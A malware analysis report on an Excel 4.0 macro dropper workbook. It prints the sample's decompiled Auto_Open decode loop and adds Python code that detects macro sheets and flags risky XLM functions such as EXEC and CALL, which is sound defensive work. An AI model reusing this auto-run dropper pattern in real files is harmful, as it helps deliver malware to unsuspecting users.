Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d56b1c755525824d…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-25 10:43:21
Authoring application: Microsoft Excel
First seen: 2021-04-10
MD5: a3fc56835d5b25d676fd0e53e0bae404
SHA-1: cb70cba51c333363e75757503d31af2dabfcd703
SHA-256: d56b1c755525824df6d36adb06c9dcd24f5d9491557cd9b38d30761cd3babfa5
Risk score: 140

Heuristics (3)

  • OLE_XLM_AUTOOPEN_DEFINEDNAME (critical): Excel 4.0 Auto_Open defined name
    oletools (olevba) recovered an auto-execution entry from the Excel 4.0 macro sheet. In the record dump below, the 0018 record tagged "built-in-name 1" is Auto_Open, with a 7-byte formula consisting of a single ptgRef3d token (printed by olevba as Sheet!E141). Built-in names are stored as a one-byte ID rather than as the text "Auto_Open", so a plain byte-string search for the name can miss it; the recovered listing is what confirms the XLM auto-execution entry. The same heuristic fires on Auto_Close.
  • OLE_XLM_DANGEROUS_FN (critical): XLM Auto_Open with dangerous formula APIs
    The macro sheet combines the auto-execution entry with XLM formula functions that can start programs, write files or transfer control without any VBA. In this sample the one visible in the listing is FORMULA() at mTYl!E129, which writes the value of the name kIpZHnUB (set to an empty string at E70 and referenced again inside a NEXT loop that reads the tKEjK and wUCytUPwkA ranges with HLOOKUP) into the cell referenced by FftpBdpkx. The set-up block at E165-E179 defines the names the loop uses, E184 calls FWqJio (defined at E165 as E54, the routine that ends with RETURN() at E136) and E185 HALT() ends the macro. This is the usual XLM dropper pattern: the payload is decoded from cell contents at run time and never appears as a literal string in the file.
  • OLE_XLM_AUTOOPEN (medium): Excel 4.0 (XLM) macro sheet present
    The workbook contains an Excel 4.0 macro sheet sub-stream (the BOUNDSHEET record for the sheet named mTYl, alongside the ordinary worksheet named Sheet). XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
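How the first and third heuristics can be checked directly against the BIFF records, without oletools. The Python below is an added example, not the analysis platform's code and not oletools: it builds a small BIFF8 workbook-globals substream in memory (constructed to mimic the records in the listing: a worksheet, a macro sheet named mTYl, a built-in Auto_Open name pointing at E141 and an ordinary empty name dePeK; it is not carved from the sample) and walks its records to find macro-sheet BOUNDSHEET entries and built-in auto-execution names. Record layouts follow MS-XLS (BoundSheet8 and Lbl); resolving the ptgRef3d ixti through EXTERNSHEET to a sheet name is left out, so only the cell part of the target is decoded.

```python
"""Added example: recover XLM auto-exec signals from a raw BIFF8 Workbook stream."""
import struct

RT_NAME, RT_BOUNDSHEET, RT_EOF = 0x0018, 0x0085, 0x000A
FLAG_BUILTIN = 0x0020                      # Lbl.fBuiltin: name is a one-byte built-in ID
BUILTIN = {0x00: "Consolidate_Area", 0x01: "Auto_Open", 0x02: "Auto_Close",
           0x06: "Print_Area", 0x07: "Print_Titles",
           0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC_IDS = {0x01, 0x02, 0x0A, 0x0B}   # names Excel runs without user interaction
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
DT_MACRO_SHEET = 0x01                      # BoundSheet8.dt: 0 worksheet, 1 XLM macro sheet


def record(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def boundsheet(name, sheet_type, state, pos=0):
    # BoundSheet8: lbPlyPos(4) hsState(1) dt(1) ShortXLUnicodeString(cch, flags, chars)
    raw = name.encode("latin-1")
    return record(RT_BOUNDSHEET, struct.pack("<IBBBB", pos, state, sheet_type, len(raw), 0) + raw)


def ptg_ref3d(ixti, row, col):
    # ptgRef3d 0x3A ixti(2) rw(2) col(2): the 7-byte formula the listing shows as "len=7 ptgRef3d"
    return struct.pack("<BHHH", 0x3A, ixti, row, col)


def name_record(rgce, name=None, builtin_id=None, itab=0):
    # Lbl: flags(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) reserved(4) | name | rgce
    flags = FLAG_BUILTIN if builtin_id is not None else 0
    chars = bytes([builtin_id]) if builtin_id is not None else name.encode("latin-1")
    hdr = struct.pack("<HBBHHHBBBB", flags, 0, len(chars), len(rgce), 0, itab, 0, 0, 0, 0)
    return record(RT_NAME, hdr + b"\x00" + chars + rgce)   # \x00 = fHighByte clear (8-bit chars)


def iter_records(data):
    off = 0
    while off + 4 <= len(data):
        rtype, rlen = struct.unpack_from("<HH", data, off)
        yield rtype, data[off + 4:off + 4 + rlen]
        off += 4 + rlen


def xl_string(buf, off, cch):
    """XLUnicodeStringNoCch at buf[off]: flags byte, then cch 8-bit or UTF-16LE chars."""
    wide = buf[off] & 1
    raw = buf[off + 1:off + 1 + cch * (2 if wide else 1)]
    return raw.decode("utf-16-le" if wide else "latin-1"), off + 1 + len(raw)


def col_letters(col):
    s, c = "", col + 1
    while c:
        c, r = divmod(c - 1, 26)
        s = chr(65 + r) + s
    return s


def scan_biff(data):
    out = {"macro_sheets": [], "auto_exec": [], "other_names": []}
    for rtype, p in iter_records(data):
        if rtype == RT_BOUNDSHEET and len(p) >= 8:
            name, _ = xl_string(p, 7, p[6])
            if p[5] == DT_MACRO_SHEET:
                out["macro_sheets"].append((name, SHEET_STATE.get(p[4] & 3, "?")))
        elif rtype == RT_NAME and len(p) >= 16:
            flags, _key, cch, cce = struct.unpack_from("<HBBH", p, 0)
            bid = p[15] if flags & FLAG_BUILTIN else None
            if bid is not None:
                name, end = BUILTIN.get(bid, f"builtin_{bid:#04x}"), 16
            else:
                name, end = xl_string(p, 14, cch)
            rgce, target = p[end:end + cce], "?"
            if len(rgce) >= 7 and rgce[0] & 0x1F == 0x1A:   # ptgRef3d, any token class
                row, col = struct.unpack_from("<HH", rgce, 3)
                target = f"{col_letters(col & 0x3FFF)}{row + 1}"
            if bid in AUTO_EXEC_IDS:
                out["auto_exec"].append((name, target))
            else:
                out["other_names"].append(name)
    return out


def is_xlm_autoexec(findings):
    """The report's critical condition: an XLM macro sheet plus an auto-exec defined name."""
    return bool(findings["macro_sheets"]) and bool(findings["auto_exec"])


# Constructed globals substream mimicking the listing's records (not carved from the sample).
SAMPLE = (boundsheet("Sheet", 0x00, 0, 0x0400)
          + boundsheet("mTYl", DT_MACRO_SHEET, 0, 0x0800)
          + name_record(ptg_ref3d(0, 140, 4), builtin_id=0x01)   # built-in 1 = Auto_Open -> E141
          + name_record(b"", name="dePeK")                      # ordinary empty name, as listed
          + record(RT_EOF, b""))

if __name__ == "__main__":
    r = scan_biff(SAMPLE)
    print("b'Auto_Open' in stream:", b"Auto_Open" in SAMPLE)   # False: stored as ID 0x01
    print(r, "=> XLM auto-exec:", is_xlm_autoexec(r))
```

On a real file the stream comes out of the OLE container, for instance olefile.OleFileIO(path).openstream("Workbook").read() (olefile assumed installed). The payload lengths the constructed NAME records produce, 23 bytes for the built-in Auto_Open and 20 for dePeK, match the second column of the corresponding 0018 lines in the listing, which is a quick sanity check that the layout above is right.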

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename        Kind       Source                                                  Size
xlm_macros.txt  xlm-macro  oletools.olevba.extract_all_macros (XLM macro listing)  6416 bytes
SHA-256: 03a87328b13f7705854b2162f33207eb28bdfb560cb9859ccd5d1b1cf2ae1106
Preview (first 1,000 lines of the extracted script). The listing has two parts: a record dump of the BIFF workbook stream (record type, length, description; the 0018 lines are defined-name records despite the LABEL caption, and their detail field shows the name, its formula length and first token), followed by a Sheet,Reference,Formula,Value table of the decompiled XLM formulas found on the macro sheet mTYl.
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  mTYl
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!E141 
' 0018     20 LABEL : Cell Value, String Constant - dePeK len=0 
' 0018     26 LABEL : Cell Value, String Constant - DuwdWtzVtbM len=0 
' 0018     26 LABEL : Cell Value, String Constant - DyMTNCTmwcX len=0 
' 0018     24 LABEL : Cell Value, String Constant - FftpBdpkx len=0 
' 0018     24 LABEL : Cell Value, String Constant - FqAeBQUfr len=0 
' 0018     21 LABEL : Cell Value, String Constant - FWqJio len=0 
' 0018     25 LABEL : Cell Value, String Constant - fXTSJByQuw len=0 
' 0018     23 LABEL : Cell Value, String Constant - JEjyWdhQ len=0 
' 0018     25 LABEL : Cell Value, String Constant - JXRVMitBNK len=0 
' 0018     21 LABEL : Cell Value, String Constant - kAhxOV len=0 
' 0018     23 LABEL : Cell Value, String Constant - kIpZHnUB len=0 
' 0018     25 LABEL : Cell Value, String Constant - KsoVIxEwYe len=0 
' 0018     26 LABEL : Cell Value, String Constant - qIkXHdNgpIC len=0 
' 0018     27 LABEL : Cell Value, String Constant - qiwkTpHRBype len=0 
' 0018     20 LABEL : Cell Value, String Constant - tKEjK len=0 
' 0018     27 LABEL : Cell Value, String Constant - vxMJtTPiTIBS len=0 
' 0018     25 LABEL : Cell Value, String Constant - wUCytUPwkA len=0 
' 0018     23 LABEL : Cell Value, String Constant - xgwjjOgk len=0 
' 0018     26 LABEL : Cell Value, String Constant - YUAUbJzVxQP len=0 
' 0018     20 LABEL : Cell Value, String Constant - zcaTB len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  mTYl,E54,"SET.NAME("xgwjjOgk",VALUE("0"))",""
'  mTYl,E56,"SET.NAME("qiwkTpHRBype",xgwjjOgk)",""
'  mTYl,E58,"SET.NAME("JXRVMitBNK",xgwjjOgk)",""
'  mTYl,E60,"SET.NAME("DuwdWtzVtbM",COUNTA(tKEjK))",""
'  mTYl,E64,"SET.NAME("FqAeBQUfr",COUNTA(wUCytUPwkA))",""
'  mTYl,E66,[],""
'  mTYl,E70,"SET.NAME("kIpZHnUB","")",""
'  mTYl,E73,"qiwkTpHRBype",""
'  mTYl,E77,"SET.NAME("DyMTNCTmwcX",HLOOKUP("*",tKEjK,qiwkTpHRBype,FALSE))",""
'  mTYl,E81,"kAhxOV",""
'  mTYl,E85,"SET.NAME("qIkXHdNgpIC",xgwjjOgk)",""
'  mTYl,E87,[],""
'  mTYl,E89,"qIkXHdNgpIC",""
'  mTYl,E92,"fXTSJByQuw",""
'  mTYl,E97,"vxMJtTPiTIBS",""
'  mTYl,E101,"YUAUbJzVxQP",""
'  mTYl,E106,"SET.NAME("JEjyWdhQ",VALUE(HLOOKUP("*",wUCytUPwkA,YUAUbJzVxQP,FALSE)))",""
'  mTYl,E108,"KsoVIxEwYe",""
'  mTYl,E113,"kIpZHnUB",""
'  mTYl,E117,"JXRVMitBNK",""
'  mTYl,E121,NEXT(),""
'  mTYl,E126,"FftpBdpkx",""
'  mTYl,E129,"SET.NAME("f",INT(T(FORMULA(T(kIpZHnUB)&"",""&T(FftpBdpkx)))))",""
'  mTYl,E131,"dePeK",""
'  mTYl,E133,NEXT(),""
'  mTYl,E136,RETURN(),""
'  mTYl,E165,"SET.NAME("FWqJio",E54)",""
'  mTYl,E167,"tKEjK",""
'  mTYl,E172,"SET.NAME("wUCytUPwkA",R76C12)",""
'  mTYl,E176,"SET.NAME("dePeK",185)",""
'  mTYl,E179,"SET.NAME("zcaTB",5)",""
'  mTYl,E184,FWqJio(),""
'  mTYl,E185,HALT(),""
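Reading the formula table above. The Python below is an added example, not oletools output and not part of the report: it parses a subset of the Sheet,Reference,Formula,Value rows copied from the listing, collects the SET.NAME definitions, resolves calls to user-defined names back to the cells they stand for, and flags the functions the OLE_XLM_DANGEROUS_FN heuristic refers to. The dangerous-function table is my own short list, not the platform's rule set, and the row subset is exactly the text shown in the listing (olevba leaves the inner quotes unescaped, which is why the rows are not parsed as standard CSV).

```python
"""Added example: triage an olevba XLM formula listing for names, control flow and risky calls."""
import re
from collections import defaultdict

# Subset of the decompiled-formula rows copied verbatim from the listing above.
LISTING = r'''
'  mTYl,E54,"SET.NAME("xgwjjOgk",VALUE("0"))",""
'  mTYl,E60,"SET.NAME("DuwdWtzVtbM",COUNTA(tKEjK))",""
'  mTYl,E77,"SET.NAME("DyMTNCTmwcX",HLOOKUP("*",tKEjK,qiwkTpHRBype,FALSE))",""
'  mTYl,E106,"SET.NAME("JEjyWdhQ",VALUE(HLOOKUP("*",wUCytUPwkA,YUAUbJzVxQP,FALSE)))",""
'  mTYl,E113,"kIpZHnUB",""
'  mTYl,E121,NEXT(),""
'  mTYl,E129,"SET.NAME("f",INT(T(FORMULA(T(kIpZHnUB)&"",""&T(FftpBdpkx)))))",""
'  mTYl,E133,NEXT(),""
'  mTYl,E136,RETURN(),""
'  mTYl,E165,"SET.NAME("FWqJio",E54)",""
'  mTYl,E172,"SET.NAME("wUCytUPwkA",R76C12)",""
'  mTYl,E176,"SET.NAME("dePeK",185)",""
'  mTYl,E184,FWqJio(),""
'  mTYl,E185,HALT(),""
'''

# XLM functions worth flagging and why (my categorisation, not the report's rule set).
DANGEROUS = {
    "EXEC": "starts an external program",
    "CALL": "calls an exported DLL function (raw Win32 API access)",
    "REGISTER": "registers a DLL export for a later CALL",
    "RUN": "transfers control to a macro elsewhere in the workbook",
    "FORMULA": "writes text into a cell as a formula (self-modifying code / staged payload)",
    "FORMULA.FILL": "writes formulas into a whole range",
    "FOPEN": "opens a file",
    "FWRITE": "writes to a file",
    "FWRITELN": "writes a line to a file",
}
FUNC_RE = re.compile(r"(?<![A-Za-z0-9_.])([A-Z][A-Z0-9.]*)\(")   # XLM built-ins are upper-case
SETNAME_RE = re.compile(r'SET\.NAME\("([^"]+)",(.*)\)')
NAME_CALL_RE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)\(\)")


def parse_rows(text):
    """Return (sheet, ref, formula) tuples from the olevba table; skips the header line."""
    rows = []
    for line in text.splitlines():
        line = line.lstrip("' ").rstrip()
        if not line:
            continue
        sheet, ref, rest = line.split(",", 2)
        if not re.fullmatch(r"[A-Z]+\d+", ref):
            continue
        formula, _value = rest.rsplit(",", 1)          # drop the trailing Value column
        if len(formula) >= 2 and formula[0] == formula[-1] == '"':
            formula = formula[1:-1]                    # olevba wraps formula text in quotes
        rows.append((sheet, ref, formula))
    return rows


def find_dangerous(rows):
    """Map each flagged XLM function to the cells that call it."""
    hits = defaultdict(list)
    for sheet, ref, formula in rows:
        for fn in FUNC_RE.findall(formula):
            if fn in DANGEROUS:
                hits[fn].append(f"{sheet}!{ref}")
    return dict(hits)


def defined_names(rows):
    """SET.NAME(name, expr) definitions, in cell order (later definitions overwrite)."""
    names = {}
    for _sheet, _ref, formula in rows:
        m = SETNAME_RE.fullmatch(formula)
        if m:
            names[m.group(1)] = m.group(2)
    return names


def name_calls(rows, names):
    """Cells that call a user-defined name as a subroutine, with the name's definition."""
    calls = []
    for sheet, ref, formula in rows:
        m = NAME_CALL_RE.fullmatch(formula)
        if m and m.group(1) in names:
            calls.append((f"{sheet}!{ref}", m.group(1), names[m.group(1)]))
    return calls


if __name__ == "__main__":
    rows = parse_rows(LISTING)
    names = defined_names(rows)
    for fn, cells in find_dangerous(rows).items():
        print(f"{fn} at {', '.join(cells)}: {DANGEROUS[fn]}")
    for cell, name, target in name_calls(rows, names):
        print(f"{cell} calls {name}() which is defined as {target}")
```

The point of resolving name calls is that the real body of the macro is not where the auto-exec name points: E184 calls FWqJio, and FWqJio was defined at E165 as the cell E54, so the decode loop that ends at RETURN() (E136) is reached as a subroutine, after which HALT() at E185 stops execution. FORMULA() inside that loop is the only flagged call in this subset; the shell and file functions in the table are absent here, which is consistent with a stager whose next-stage formula is assembled at run time rather than stored in the file.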